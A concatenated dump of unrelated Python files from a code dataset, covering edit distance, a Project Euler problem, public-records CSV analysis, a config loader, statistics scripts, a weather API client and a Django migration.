        return len(tar), "add %s" % tar
    if not tar:
        return len(ori), "remove %s" % ori
    ori_head, ori_rest, tar_head, tar_rest = ori[0], ori[1:], tar[0], tar[1:]
    # Match/replace the heads, or delete from ori, or add from tar.
    edit_op_dis = cal_edit_distance(ori_rest, tar_rest)
    if ori_head != tar_head:
        edit_op_dis = edit_tuple(edit_op_dis, 1, "replace %s with %s" % (ori_head, tar_head))
    del_op_dis = cal_edit_distance(ori_rest, tar)
    del_op_dis = edit_tuple(del_op_dis, 1, "delete %s" % ori_head)
    add_op_dis = cal_edit_distance(ori, tar_rest)
    add_op_dis = edit_tuple(add_op_dis, 1, "add %s" % tar_head)
    return min(edit_op_dis, del_op_dis, add_op_dis, key=lambda e: e[0])
from collections import defaultdict
def edit_distance_norec(ori, tar):
    """Levenshtein distance between `ori` and `tar`, bottom-up DP."""
    rows, cols = len(ori), len(tar)
    # dist[i][j] = edit distance between ori[:i] and tar[:j]
    dist = [[0] * (cols + 1) for _ in range(rows + 1)]
    for j in range(cols + 1):
        dist[0][j] = j
    for i in range(rows + 1):
        dist[i][0] = i
    for i in range(1, rows + 1):
        for j in range(1, cols + 1):
            deletion = dist[i - 1][j] + 1
            insertion = dist[i][j - 1] + 1
            substitution = dist[i - 1][j - 1] + (
                0 if ori[i - 1] == tar[j - 1] else 1)
            dist[i][j] = min(deletion, insertion, substitution)
    return dist[rows][cols]
if __name__ == '__main__':
print(cal_edit_distance("fang", "renf")[0])
print(edit_distance_norec("fang", "renf"))
|
8,040 | e6efd2de5f92d66f1b734a2173fc8681af3c4cc8 | def myswap(a, b):
temp = a
a = b
b = temp
if a < b:
print(a, b)
else:
print(b, a)
a, b = map(int,input().split())
myswap(a,b) |
8,041 | ba85f3c8a9e40f30076c13487a97567f7bc646dc | import numpy as np
from scipy import stats
# Two samples with genuinely different means: expect a very small p-value.
sample_a = np.random.normal(25.0, 5.0, 10000)
sample_b = np.random.normal(26.0, 5.0, 10000)
print(stats.ttest_ind(sample_a, sample_b))  # real difference, very low chance of randomness
sample_b = np.random.normal(25.0, 5.0, 10000)
print(stats.ttest_ind(sample_a, sample_b))  # no change, outcome is likely random
|
8,042 | 2ec8b9a92f8dd42faf99f0cd569ebf356e12c1d6 | '''It can be seen that the number, 125874, and its double, 251748, contain
exactly the same digits, but in a different order.
Find the smallest positive integer, x, such that 2x, 3x, 4x, 5x, and 6x, contain
the same digits.
'''
import common
import itertools
def digits(x):
    """Return the set of decimal digits appearing in x."""
    return {int(ch) for ch in str(x)}
common.assertEquals(digits(125874), digits(251748))
def same_digits_as_multiples(x, multiples):
    """True iff x has no repeated digits and each m*x (m in multiples)
    uses exactly the same digit set as x."""
    base = digits(x)
    # duplicate digits are implicitly forbidden
    if len(base) != len(str(x)):
        return False
    return all(digits(m * x) == base for m in multiples)
common.assertEquals(True, same_digits_as_multiples(125874, [2]))
common.assertEquals(False, same_digits_as_multiples(123456, [2]))
def euler052():
    """Return the smallest x such that 2x..6x all permute x's digits (142857)."""
    multiples = range(2,7)
    for i in itertools.count(10**5): # solution must have at least 6 digits
        if same_digits_as_multiples(i, multiples):
            return i
common.submit(euler052(), expected=142857) |
8,043 | b3758e42b52bb50d806832c6a3a76ae0537266de | '''harvestPRR: analyze Public Record Requests from CSV data provided by NextRequest
Created 27 Aug 20
@author: rik@electronicArtifacts.com
'''
from collections import defaultdict
import csv
import datetime
import json
import random
import re
import requests
import sys
import time
import urllib
import re
PRRDateFmt = '%Y-%m-%dT%H:%M:%S'
PRRDateMicroSecFmt = '%Y-%m-%dT%H:%M:%S.%f'
DateTypes = {'date_received': 'recdDate',
'date_created': 'createDate',
'status_updated': 'statusUpDate'}
def freqHist3(tbl):
    '''python3 version
    ASSUME: values are frequencies; returns sorted list of (val, freq)
    items in descending freq order.

    Ties keep their original dict order: Python's sort is stable and
    `reverse=True` preserves the order of equal elements, matching the
    previous cmp_to_key implementation exactly.
    '''
    flist = list(tbl.items())
    # key/reverse replaces the old cmp_to_key(b[1]-a[1]) comparator.
    flist.sort(key=lambda item: item[1], reverse=True)
    return flist
AllCSVHeader = ['Id', 'Created At', 'Request Text', 'Due Date', 'Point of Contact', 'Request Date',
'Status', 'URL', 'Visibility', 'Closed Date', 'Closure Reasons',
'Departments', 'Format Received', 'Staff Time (hrs:minutes)',
'Staff Time (minutes)', 'Tags', 'Embargo Ends On Date',
'Staff Cost', 'Date First Contact', 'First Contact Event',
'Compliance', 'Anticipated Fulfillment Date', 'Expiration Date',
'Requester City', 'Requester State', 'Requester Zipcode', 'Requester Company']
DeptNorm = {"Admin: Planning, Building & Neighborhood Preserv": "Admin: Building Inspection",
"Budget and Fiscal": "Budget and Revenue - Revenue Division",
"City Attorney Administration Unit": "City Attorney",
"City Auditor Unit": "City Auditor",
"City Clerk Unit": "City Clerk",
"Oakland Police Department": "Police Department",
"Contracts and Compliance": "Contracts Compliance",
"Transportation Services - Administration": "Department of Transportation",
"Fire": "Fire Department",
"Human Resources Management": "Human Resources",
"Information Technology (IT)": "Information Technology",
"Public Works Agency": "Public Works"}
CSVDTFormat = '%m/%d/%Y %H:%M:%S %p'
# 07/01/2020 09:54:53 AM
def bldIndexTblCSV(inf,startDate=None):
    '''Parse the NextRequest CSV export at `inf`.

    Returns (prrIDTbl, deptTbl): prrID -> request dict, and normalized
    department name -> list of prrIDs. Requests created before
    `startDate` (when given) or with no create date are dropped.
    Also prints summary and status-frequency diagnostics.
    '''
    prrTbl = {}
    deptTbl = defaultdict(list) # keep list of all prrIDs
    statusTbl = defaultdict(int)
    ncloseDate = 0
    nolder = 0
    nmultDept = 0
    deptSepChar = b'\xef\xbf\xbd' # only used in Finance
    reader = csv.DictReader(open(inf,encoding = "utf8",errors='replace'))
    for i,entry in enumerate(reader):
        prr = {}
        prrID = entry['Id']
        createDateStr = entry['Created At'].strip()
        prr['createDate'] = datetime.datetime.strptime(createDateStr,CSVDTFormat) if createDateStr != '' else None
        if prr['createDate'] == None or \
            (startDate != None and prr['createDate'] < startDate):
            nolder += 1
            continue
        deptStr = entry['Departments'].strip()
        # NB: multiple department separated by semi-colon
        if deptStr.find(';') == -1:
            deptList = [deptStr]
        else:
            nmultDept += 1
            deptList = [dept.strip() for dept in deptStr.split(';')]
        # Normalize department names via DeptNorm; drop empty names.
        deptList2 = []
        for dept in deptList:
            ndept = DeptNorm[dept] if dept in DeptNorm else dept
            if ndept != '':
                deptList2.append(ndept)
                deptTbl[ndept].append(prrID)
        prr['dept'] = deptList2
        closeDateStr = entry['Closed Date'].strip()
        prr['closeDate'] = datetime.datetime.strptime(closeDateStr,CSVDTFormat) if closeDateStr != '' else None
        prr['status'] = entry['Status'].strip()
        prr['text'] = entry['Request Text'].strip()
        prr['closeReason'] = entry['Closure Reasons'].strip()
        prr['URL'] = entry['URL'].strip()
        statusTbl[ prr['status'] ] += 1
        if prr['closeDate'] != None:
            ncloseDate += 1
        prrTbl[prrID] = prr
    print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % \
        (len(prrTbl),len(deptTbl),nmultDept,ncloseDate))
    if startDate != None:
        print('bldIndexTblCSV: NOld dropped=%d' % (nolder))
    # freqList = freqHist3(deptTbl)
    # print('Dept,Freq')
    # for dept,freq in freqList:
    #     print('"%s",%d' % (dept,freq))
    freqList = freqHist3(statusTbl)
    print('Status,Freq')
    for status,freq in freqList:
        print('"%s",%d' % (status,freq))
    return (prrTbl, deptTbl)
def compHistAvg(hist):
    '''Return (total count, weighted mean) of a value -> frequency histogram.'''
    total = 0
    weighted = 0
    for value, freq in hist.items():
        total += freq
        weighted += value * freq
    return total, float(weighted) / total
def compMedian(hist):
    '''Return the median value of a value -> frequency histogram.

    ASSUME hist: value -> freq. The median is the smallest value whose
    cumulative frequency exceeds half of the total count.
    '''
    # BUG FIX: the old singleton branch returned hist[0] -- i.e. the
    # *frequency* stored under key 0, or a KeyError for any other single
    # key. A singleton histogram's median is its only value.
    if len(hist) == 1:
        return next(iter(hist))
    n = 0
    vn = {}
    # Cumulative frequency per value, ascending.
    for v in sorted(hist.keys()):
        n += hist[v]
        vn[v] = n
    half = float(n/2.)
    for v in sorted(hist.keys()):
        if vn[v] > half:
            return v
def anlyzCreateDates(prrIDTbl,outf):
    '''Write a CSV of request counts per "YYYY-MM" create month to `outf`.

    Requests without a createDate are counted and reported, not written.
    '''
    dateDist = defaultdict(int)
    nmissdate = 0
    for prrID,prr in prrIDTbl.items():
        # 180204
        # for dtype in DateTypes.values():
        #     if dtype in prr:
        #         if cdateFnd == None:
        #             cdateFnd = prr[dtype]
        #         else:
        #             if prr[dtype] != cdateFnd:
        #                 cdateFnd = min([cdateFnd,prr[dtype]])
        cdateFnd = prr['createDate']
        if cdateFnd== None:
            nmissdate += 1
            continue
        mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month)
        dateDist[mkey] += 1
    print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl),nmissdate))
    allMon = list(dateDist.keys())
    allMon.sort()
    outs = open(outf,'w')
    outs.write('Month,Freq\n')
    for mkey in allMon:
        outs.write('%s,%d\n' % (mkey,dateDist[mkey]))
    outs.close()
def normDeptName(dept):
    """Upper-case `dept` and replace every non-word character with '_'."""
    return re.sub(r'\W', '_', dept.upper())
def anlyzClearDates(prrIDTbl,deptTbl,startDate,outdir,minDeptFreq=10):
    '''Per-department response-time analysis written as CSVs under `outdir`.

    For each department with more than `minDeptFreq` requests, writes
    "<DEPT>-RT.csv" with monthly close counts, open counts, and avg/median
    days-to-close. Also writes an aggregate "NonOPD-RT.csv" (everything
    except the Police Department) and "missClose.csv" counting closed
    requests that lack a close date, by department and month.
    '''
    allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) > minDeptFreq ]
    allDept.sort()
    nonOPDresp = defaultdict(lambda: defaultdict(int)) # month -> ndays -> freq
    nonOPDopen = defaultdict(int) # month -> freq
    print('\n# Dept,NOld,NMissRecd,NMissClose')
    missCloseDetails = defaultdict(lambda: defaultdict(list)) # dept -> recd -> [prrID]
    for dept in allDept:
        responseMon = defaultdict(lambda: defaultdict(int)) # month -> ndays -> freq
        openReqMon = defaultdict(int) # month -> freq
        nmissRecd = 0
        nmissClose = 0
        nolder = 0
        for prrID in deptTbl[dept]:
            prr = prrIDTbl[prrID]
            # 180228
            # recdDateTime = prr['recdDate']
            recdDateTime = prr['createDate']
            if recdDateTime==None:
                nmissRecd += 1
                continue
            if recdDateTime < startDate:
                nolder += 1
                continue
            try:
                recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month)
            except Exception as e:
                print('huh')
            if prr['status'] == 'Closed':
                # 180228
                # closeDate = prr['statusUpDate']
                closeDate = prr['closeDate']
                if closeDate==None:
                    nmissClose += 1
                    missCloseDetails[dept][recdMonKey].append(prrID)
                    continue
                respDelay = closeDate - recdDateTime
                delayDays = respDelay.days
                responseMon[recdMonKey][delayDays] += 1
                # NB: was 'Oakland Police Deparment' in 180204
                if dept != 'Police Department':
                    nonOPDresp[recdMonKey][delayDays] += 1
            else:
                openReqMon[recdMonKey] += 1
                # NB: was 'Oakland Police Deparment' in 180204
                if dept != 'Police Department':
                    nonOPDopen[recdMonKey] += 1
        print('"%s",%d,%d,%d' % (dept,nolder,nmissRecd,nmissClose))
        allMonth = list(responseMon.keys())
        allMonth.sort()
        normDept = normDeptName(dept)
        outf = outdir + normDept + '-RT.csv'
        outs = open(outf,'w')
        outs.write('Month,NClose,NOpen,Avg,Median\n')
        for recdMonKey in allMonth:
            nreq,avgDelay = compHistAvg(responseMon[recdMonKey])
            medianDelay = compMedian(responseMon[recdMonKey])
            outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey,nreq,openReqMon[recdMonKey],avgDelay,medianDelay))
        outs.close()
        # outf = outdir + normDept + '-nopen.csv'
        # outs = open(outf,'w')
        # outs.write('Month,NOpen\n')
        # for recdMonKey in allMonth:
        #     outs.write('%s,%d\n' % (recdMonKey,openReqMon[recdMonKey]))
        # outs.close()
    allMonth = list(nonOPDresp.keys())
    allMonth.sort()
    outf = outdir + 'NonOPD-RT.csv'
    outs = open(outf,'w')
    outs.write('Month,N,NOPen,Avg,Median\n')
    for recdMonKey in allMonth:
        nreq,avgDelay = compHistAvg(nonOPDresp[recdMonKey])
        medianDelay = compMedian(nonOPDresp[recdMonKey])
        outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey,nreq,nonOPDopen[recdMonKey],avgDelay,medianDelay))
    outs.close()
    # outf = outdir + 'NonOPD-NOpen.csv'
    # outs = open(outf,'w')
    # outs.write('Month,NOpen\n')
    # for recdMonKey in allMonth:
    #     outs.write('%s,%d\n' % (recdMonKey,nonOPDopen[recdMonKey]))
    # outs.close()
    outf = outdir + 'missClose.csv'
    outs = open(outf,'w')
    # missCloseDetails: dept -> recd -> freq
    allDateSet = set()
    for dept in missCloseDetails.keys():
        allDateSet.update(missCloseDetails[dept].keys())
    allDates = sorted(list(allDateSet))
    hdr = 'Dept'
    for date in allDates:
        hdr += ',%s' % (date,)
    outs.write(hdr+'\n')
    for dept in sorted(missCloseDetails.keys()):
        line = dept
        for date in allDates:
            if date in missCloseDetails[dept]:
                line += ',%d' % (len(missCloseDetails[dept][date]),)
            else:
                line += ', '
        outs.write(line+'\n')
    outs.close()
def rptDeptFreq(prrTbl, deptTbl, startDate, outf):
    """Write a Dept,Freq CSV counting each department's requests created
    on or after `startDate`."""
    with open(outf, 'w') as outs:
        outs.write('Dept,Freq\n')
        for dept in sorted(deptTbl.keys()):
            nrecent = sum(1 for prrIdx in deptTbl[dept]
                          if prrTbl[prrIdx]['createDate'] >= startDate)
            outs.write('%s,%d\n' % (dept, nrecent))
def rptOpenPRR(prrTbl, outf):
    '''Write a CSV histogram of how long still-open requests have stayed open.

    Rows are keyed by days open (multi-year requests bucket to
    "> N year"), with separate counts and ID lists for OPD vs. non-OPD.
    '''
    daysOpen = defaultdict(lambda: defaultdict(list))  # opdP -> dkey -> [prrID]
    runDate = datetime.datetime.today()
    for prrID in prrTbl.keys():
        prr = prrTbl[prrID]
        opdP = 'Police Department' in prr['dept']
        if prr['status'] == 'Open' or prr['status'] == 'Overdue' or prr['status'] == 'Due soon':
            recdDateTime = prr['createDate']
            openPeriod = runDate - recdDateTime
            openDays = openPeriod.days
            # NB: capture integer dividend
            openYears = openDays // 365
            if openYears == 0:
                dkey = openDays
            else:
                # 1000 + years sorts multi-year buckets after day counts.
                dkey = 1000 + openYears
            daysOpen[opdP][dkey].append(prrID)
    outs = open(outf, 'w')
    outs.write('DaysOpen,NOPD,NOther,PRR-OPD,PRR-non\n')
    # BUG FIX: the original unioned daysOpen[0] with itself, silently
    # dropping any day bucket that only OPD requests fell into.
    allNDaySet = set(daysOpen[0].keys()).union(set(daysOpen[1].keys()))
    allNDay = sorted(list(allNDaySet))
    for nday in allNDay:
        if nday > 365:
            lbl = '> %d year' % (nday - 1000)
        else:
            lbl = '%d' % nday
        opdList = daysOpen[1][nday] if nday in daysOpen[1] else []
        nonList = daysOpen[0][nday] if nday in daysOpen[0] else []
        outs.write('%s,%d,%d,"%s","%s"\n' % (lbl, len(opdList), len(nonList), opdList, nonList))
    outs.close()
def getWebPages(prrTbl,outf):
    """Fetch each request's URL and count pages that mention 'pdf'.

    NOTE(review): looks exploratory -- the CSV gets only its header (the
    per-row write is commented out), and `npdf`/`opdP` are computed but
    never persisted; confirm before relying on the output file.
    """
    outs = open(outf,'w')
    outs.write('PRRID,OPD,Text\n')
    nempty = 0
    npdf = 0
    for i,prrID in enumerate(sorted(prrTbl.keys())):
        prr = prrTbl[prrID]
        if prr['URL'] == '':
            nempty += 1
            continue
        opdP = 'Police Department' in prr['dept']
        url = prr['URL']
        response = urllib.request.urlopen(url)
        webContentBytes = response.read()
        webContent = webContentBytes.decode("utf-8")
        if webContent.find('pdf') != -1:
            print('here')
            npdf += 1
        else:
            continue
        if i % 100 == 0:
            print(i,npdf,nempty)
        # outs.write('%s,%d,"%s"\n' % (prrID,opdP,prr['text']))
    outs.close()
    print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl),nempty))
def loadPRRQuery(inf):
    """Read a CSV with a PRRId column and return the stripped IDs in order."""
    prrIDList = []
    # columns: Exhibit,PRRId
    for row in csv.DictReader(open(inf)):
        prrIDList.append(row['PRRId'].strip())
    return prrIDList
def rptQry(qryList,outf):
    """Write a CSV summarizing each PRR id in `qryList`.

    Reads the module-level `prr20Recent` table (built in __main__);
    days-open is measured against today's date.
    """
    outs = open(outf,'w')
    outs.write('PRID,CreateDate,DaysOpen,Status\n')
    runDate = datetime.datetime.today()
    for prrID in qryList:
        prr = prr20Recent[prrID]
        recdDateTime = prr['createDate']
        openPeriod = runDate - recdDateTime
        openDays = openPeriod.days
        outs.write('%s,%s,%d,%s\n' % (prrID,prr['createDate'].date(),openDays,prr['status']))
    outs.close()
if __name__ == '__main__':
dataDir = '/Users/rik/Data/c4a-Data/OAK_data/recordTrac/'
startDate = datetime.datetime(2017,1,1)
csvFile = dataDir + 'requests-2020-07-01-sdoran.csv'
# prr20, deptTbl = bldIndexTblCSV(csvFile)
prr20Recent, deptTbl = bldIndexTblCSV(csvFile,startDate)
openPRRFile = dataDir + 'openPRR_200831.csv'
rptOpenPRR(prr20Recent,openPRRFile)
deptFreqFile = dataDir + 'deptFreq2.csv'
rptDeptFreq(prr20Recent, deptTbl,startDate,deptFreqFile)
createDateFile = dataDir + 'createDate_200831.csv'
anlyzCreateDates(prr20Recent,createDateFile)
clearDateDir = dataDir + 'deptClear_200831/'
anlyzClearDates(prr20Recent,deptTbl,startDate,clearDateDir)
openOPDFile = dataDir + 'openOPD_200831.csv'
rptOpenPRR(prr20Recent,openOPDFile)
|
8,044 | 63bd8a15dd489844968f46c4b0ffe157d567537a |
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import pwd
import sys
from string import ascii_letters, digits
from ConfigParser import SafeConfigParser
# copied from utils, avoid circular reference fun :)
def mk_boolean(value):
    """Coerce a config value to bool: true/t/y/1/yes (any case) are True;
    None and everything else are False."""
    if value is None:
        return False
    return str(value).lower() in [ "true", "t", "y", "1", "yes" ]
def get_config(p, section, key, env_var, default, boolean=False, integer=False, floating=False, islist=False):
    '''Fetch a configuration variable and cast it to the requested type.

    Casting flags only apply to truthy values (except boolean, which is
    always coerced).
    '''
    raw = _get_config(p, section, key, env_var, default)
    if boolean:
        return mk_boolean(raw)
    if raw:
        if integer:
            return int(raw)
        if floating:
            return float(raw)
        if islist:
            return [item.strip() for item in raw.split(',')]
    return raw
def _get_config(p, section, key, env_var, default):
''' helper function for get_config '''
if env_var is not None:
value = os.environ.get(env_var, None)
if value is not None:
return value
if p is not None:
try:
return p.get(section, key, raw=True)
except:
return default
return default
def load_config_file():
    ''' Load Config File order(first found is used): ENV, CWD, HOME, /etc/sojourner

    Returns the parsed SafeConfigParser, or None if no config file exists.
    '''
    p = SafeConfigParser()
    path0 = os.getenv("SOJOURNER_CONFIG", None)
    if path0 is not None:
        path0 = os.path.expanduser(path0)
    path1 = os.getcwd() + "/sojourner.cfg"
    path2 = os.path.expanduser("~/.sojourner.cfg")
    path3 = "/etc/sojourner/sojourner.cfg"
    for path in [path0, path1, path2, path3]:
        if path is not None and os.path.exists(path):
            try:
                p.read(path)
            # BUG FIX: this previously caught `configparser.Error`, but only
            # SafeConfigParser is imported (from the py2 ConfigParser
            # module), so a parse failure raised NameError instead of
            # printing this message.
            except Exception as e:
                print("Error reading config file: \n{0}".format(e))
                sys.exit(1)
            return p
    return None
def shell_expand_path(path):
    ''' shell_expand_path is needed as os.path.expanduser does not work
    when path is None, which is the default for SOJOURNER_PRIVATE_KEY_FILE '''
    if not path:
        # Pass None (and '') through untouched.
        return path
    return os.path.expanduser(os.path.expandvars(path))
# Parse the first sojourner.cfg found; p is None when no config file exists.
p = load_config_file()
# Effective (possibly setuid) user running this process.
active_user = pwd.getpwuid(os.geteuid())[0]
# sections in config file
DEFAULTS='defaults'
# configurable things
# def get_config(p, section, key, env_var, default, boolean=False, integer=False, floating=False, islist=False):
DEFAULT_SOJOURNER_HOME = shell_expand_path(get_config(p, DEFAULTS, 'sojourner_home','DEFAULT_SOJOURNER_HOME',os.environ['HOME']+'/Sojourner'))
DEFAULT_DB_ENGINE = get_config(p, DEFAULTS, 'db_engine', 'SOJOURNER_DB_ENGINE', 'sqlite')
DEFAULT_DB_HOST = get_config(p, DEFAULTS, 'db_host', 'SOJOURNER_DB_HOST', 'localhost')
DEFAULT_DB_PORT = get_config(p, DEFAULTS, 'db_port', 'SOJOURNER_DB_PORT', '3306')
DEFAULT_DB_USER = get_config(p, DEFAULTS, 'db_user', 'SOJOURNER_DB_USER', 'sojourner')
DEFAULT_DB_PASSWD = get_config(p, DEFAULTS, 'db_passwd', 'SOJOURNER_DB_PASSWD', 'sojourner')
DEFAULT_DB_DBNAME = get_config(p, DEFAULTS, 'db_dbname', 'SOJOURNER_DB_DBNAME', 'sojourner')
SOJOURNER_PROVISIONER = get_config(p, 'sojourner', 'provisioner', 'SOJOURNER_PROVISIONER', 'ansible')
# ANSIBLE RELATED
# NOTE(review): DEFAULT_SOJOURNER_HOME has no trailing slash, so these
# defaults expand to ".../SojournerAnsible_Roles" and
# ".../SojournerChef_Cookbooks" — confirm a path separator isn't missing.
SOJOURNER_ANSIBLE_ROLES = get_config(p, 'ansible', 'ansible_roles', 'SOJOURNER_ANSIBLE_ROLES', DEFAULT_SOJOURNER_HOME + 'Ansible_Roles')
# CHEF RELATED
SOJOURNER_CHEF_COOKBOOKS = get_config(p, 'chef', 'chef_cookbooks', 'SOJOURNER_CHEF_COOKBOOKS', DEFAULT_SOJOURNER_HOME + 'Chef_Cookbooks')
|
8,045 | 647258ee5f2f6f1cb8118bcf146b8959c65b70cd | import numpy as n, pylab as p
from scipy import stats as st
# Kolmogorov-Smirnov distance (max |CDF difference|) between analytic models.
# Case 1: two unit-variance normals whose means differ by 0.1.
a=st.norm(0,1)
b=st.norm(0.1,1)
domain=n.linspace(-4,4,10000)
avals=a.cdf(domain)
bvals=b.cdf(domain)
diffN=n.abs(avals-bvals).max()
# Case 2: two zero-mean normals whose standard deviations differ (1 vs 1.2).
a=st.norm(0,1)
b=st.norm(0,1.2)
domain=n.linspace(-4,4,10000)
avals=a.cdf(domain)
bvals=b.cdf(domain)
diffN2=n.abs(avals-bvals).max()
# Case 3: unit-width uniforms offset by 0.05.
a=st.uniform(0,1)
b=st.uniform(0.05,1.0)
domain=n.linspace(0,1.05,10000)
avals=a.cdf(domain)
bvals=b.cdf(domain)
diffU=n.abs(avals-bvals).max()
# Case 4: uniforms with the same centre but different widths.
a=st.uniform(0,1)
b=st.uniform(-0.05,1.05)
domain=n.linspace(0,1.05,10000)
avals=a.cdf(domain)
bvals=b.cdf(domain)
diffU2=n.abs(avals-bvals).max()
#a=st.weibull(1.5)
#b=st.weibull(1.7)
#domain=n.linspace(0,1.05,10000)
#avals=a.cdf(domain)
#bvals=b.cdf(domain)
#diffW=n.abs(avals-bvals).max()
#a=st.power(1.5)
#b=st.power(1.7)
#domain=n.linspace(0,1.05,10000)
#avals=a.cdf(domain)
#bvals=b.cdf(domain)
#diffP=n.abs(avals-bvals).max()
#x = n.arange(1,100.)/50.
# Sampling grid used by the hand-rolled Weibull comparison below.
x=n.linspace(0,20,100000)
step=x[1]-x[0]
def weib(x, nn, a):
    """Weibull pdf with scale `nn` and shape `a`, evaluated elementwise at x."""
    z = x / nn
    return (a / nn) * z ** (a - 1) * n.exp(-z ** a)
#count, bins, ignored = p.hist(n.random.weibull(5.,1000))
#x = n.arange(1,100.)/50.
#scale = count.max()/weib(x, 1., 5.).max()
# Weibull comparison, shapes 1.5 vs 1.7: normalize the sampled pdf so it
# integrates to 1 over the grid, then accumulate it into a CDF-like array.
W=weib(x, 1., 1.5)
W_=W/(W*step).sum()
W__=n.cumsum(W_)
W2=weib(x, 1., 1.7)
W2_=W2/(W2*step).sum()
W2__=n.cumsum(W2_)
# NOTE(review): this distance is taken between the normalized PDFs (W_),
# not the cumulative W__ arrays a true KS statistic would use — verify,
# since the printed value below comes from this line.
diffW=n.abs(W_-W2_).max()
#p.plot(x, W_)
#p.plot(x, W2_)
##p.plot(x, weib(x, 1., 5.)*scale)
#p.show()
# Power-law comparison via scipy's closed-form CDFs.
a=st.powerlaw(1.5)
b=st.powerlaw(1.7)
domain=n.linspace(0,5.05,10000)
avals=a.cdf(domain)
bvals=b.cdf(domain)
diffP=n.abs(avals-bvals).max()
print("distancias de KS para os modelos matematicos:", diffN,diffN2,diffU,diffU2,diffW,diffP)
# distancias de KS para os modelos matematicos:
# 0.0398776116762 0.0439947104098 0.0952338090952 0.047619047619 0.128565475845 0.0460149130584
# X = (-n.ln(U))^{1/a}
# Recompute the Weibull distance from cumulative sums, first normalizing
# the pdf by the bin width...
lb,rb,NE,shape1,shape2=0,10,10000,1.5,1.7
x=n.linspace(lb,rb,NE)
step=x[1]-x[0]
W=weib(x, 1., shape1)
W_=W/((W*step).sum())
W__=n.cumsum(W_)
W2=weib(x, 1., shape2)
W2_=W2/((W2*step).sum())
W2__=n.cumsum(W2_)
diffW=n.abs(W__-W2__).max()
# ...then without the bin-width factor; each pass overwrites diffW, so only
# the last value survives (and the earlier printed value used neither).
lb,rb,NE,shape1,shape2=0,10,10000,1.5,1.7
x=n.linspace(lb,rb,NE)
step=x[1]-x[0]
W=weib(x, 1., shape1)
W_=W/((W).sum())
W__=n.cumsum(W_)
W2=weib(x, 1., shape2)
W2_=W2/((W2).sum())
W2__=n.cumsum(W2_)
diffW=n.abs(W__-W2__).max()
|
8,046 | 94540561ba29d2fc1766dac7b199e0cbbbeecdfc | # name: Ali
# date: 7/12/2016
# description: uses openweathermap.org's api to get weather data about
# the city that is inputted
# unbreakable? = idk
import json
import urllib2
from collections import OrderedDict
from pprint import pprint
# OpenWeatherMap request pieces, concatenated in connectapi().
# NOTE(review): API key committed in source — should live in an env var.
api_key = "&APPID=507e30d896f751513350c41899382d89"
city_name_url = "http://api.openweathermap.org/data/2.5/weather?q="
units = "&units=metric"
# Display labels -> values; filled in by find_data() from the JSON "main" block.
general_info = {
    "Humidity (%)": 0,
    "Pressure": 0,
    "Temperature(C)": 0,
    "Max. Temp.(C)": 0,
    "Min. Temp.(C)": 0
}
def connectapi():
    # Fetch current weather for the module-level `city_input` from
    # OpenWeatherMap and publish the result through two globals:
    # `data` (ordered dict of the JSON body) and `parsed` (pretty string).
    global parsed
    global data
    urlrequest = city_name_url + city_input + units + api_key
    response = urllib2.urlopen(urlrequest)
    content = response.read()
    # OrderedDict preserves the key order of the JSON response.
    data = json.loads(content, object_pairs_hook=OrderedDict)
    parsed = json.dumps(data, indent=4, sort_keys=True)
    print parsed
def find_data():
    # Extract city/country names and the "main" measurements from the
    # module-level `data` (filled by connectapi) into display globals.
    global country_name
    global city_name
    global general_info
    # NOTE(review): the two globals below are declared but never assigned
    # here (the weather_description line is commented out).
    global weather_description
    global formatted_general_info
    city_name = str(data['name'])
    country_name = str(data['sys']['country'])
    #weather_description = data['weather']['description']
    # Map OpenWeatherMap's "main" keys onto the friendlier display labels.
    for key, value in data['main'].iteritems():
        if key == "humidity":
            general_info['Humidity (%)'] = value
        elif key == "pressure":
            general_info['Pressure'] = value
        elif key == "temp":
            general_info['Temperature(C)'] = value
        elif key == "temp_max":
            general_info['Max. Temp.(C)'] = value
        elif key == "temp_min":
            general_info['Min. Temp.(C)'] = value
        else:
            continue
print "Weather Lookup\n\nEnter the name of the city that you want\nto look at the weather details of.\n"
while True:
    # NOTE(review): str(raw_input(...)) does not raise ValueError, so this
    # handler is dead code — and if it ever fired, city_input would be
    # undefined when connectapi() runs (the except branch lacks a continue).
    try:
        city_input = str(raw_input("What city would you like to look at?"))
    except ValueError:
        print"Please enter a city name."
    connectapi()
    if "name" in data:
        find_data()
        print "\n%r in %r:\n"% (city_name, country_name)
        print """General info:"""
        pprint(general_info)
        print "\nWeather Description:\n\tidk why it doesn't let me take this data so annoying\n"
    else:
        print "Something went wrong, would you like to try again?"
        continue
    # NOTE(review): no break on success — the loop re-prompts forever.
|
8,047 | f633496f1a7cd562fd41d697a2e26831ceaef479 | __all__ = ["loading"]
from . import loading
|
8,048 | d8df9a9f95a1d4a9aa34987ec1244cc6c0c7c610 | # Generated by Django 2.0.3 on 2018-03-24 07:53
import django.core.files.storage
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated initial migration for the printer-spares app: creates
    # the Cartridge, Index and Spare models, with M2M links into the
    # `printers` and `devices` apps (hence the dependencies below).

    initial = True

    dependencies = [
        ('printers', '0001_initial'),
        ('devices', '0002_url'),
    ]

    operations = [
        migrations.CreateModel(
            name='Cartridge',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=512)),
                # Images are stored outside MEDIA_ROOT defaults, under
                # ./media/images/spares, with a placeholder default.
                ('image', models.ImageField(default='cartridge.png', storage=django.core.files.storage.FileSystemStorage(location='./media/images/spares'), upload_to='')),
                ('in_stock', models.IntegerField()),
                ('comment', models.CharField(max_length=512)),
                ('contractors', models.ManyToManyField(to='devices.Contractor')),
                ('printers', models.ManyToManyField(to='printers.Printer')),
                ('urls', models.ManyToManyField(to='devices.Url')),
            ],
        ),
        migrations.CreateModel(
            name='Index',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('index', models.CharField(max_length=512, unique=True)),
            ],
        ),
        migrations.CreateModel(
            name='Spare',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
